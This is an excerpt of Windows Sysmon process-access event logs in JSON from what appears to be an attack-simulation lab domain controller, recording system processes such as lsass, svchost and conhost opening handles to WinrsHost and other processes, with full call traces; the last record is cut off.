{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4944,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4945,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4946,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001043D90600}\r\nTargetProcessId: 4776\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001043D90600}","TargetProcessId":"4776","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4947,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001043D90600}\r\nSourceProcessId: 4776\r\nSourceThreadId: 1092\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-0010C3D80600}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001043D90600}","SourceProcessId":"4776","SourceThreadId":"1092","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-0010C3D80600}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4948,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.428\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-0010C3D80600}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.428","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-0010C3D80600}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4949,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.428\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nSourceProcessId: 1336\r\nSourceThreadId: 1660\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-0010C3D80600}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.428","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","SourceProcessId":"1336","SourceThreadId":"1660","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-0010C3D80600}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4950,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4951,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4952,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\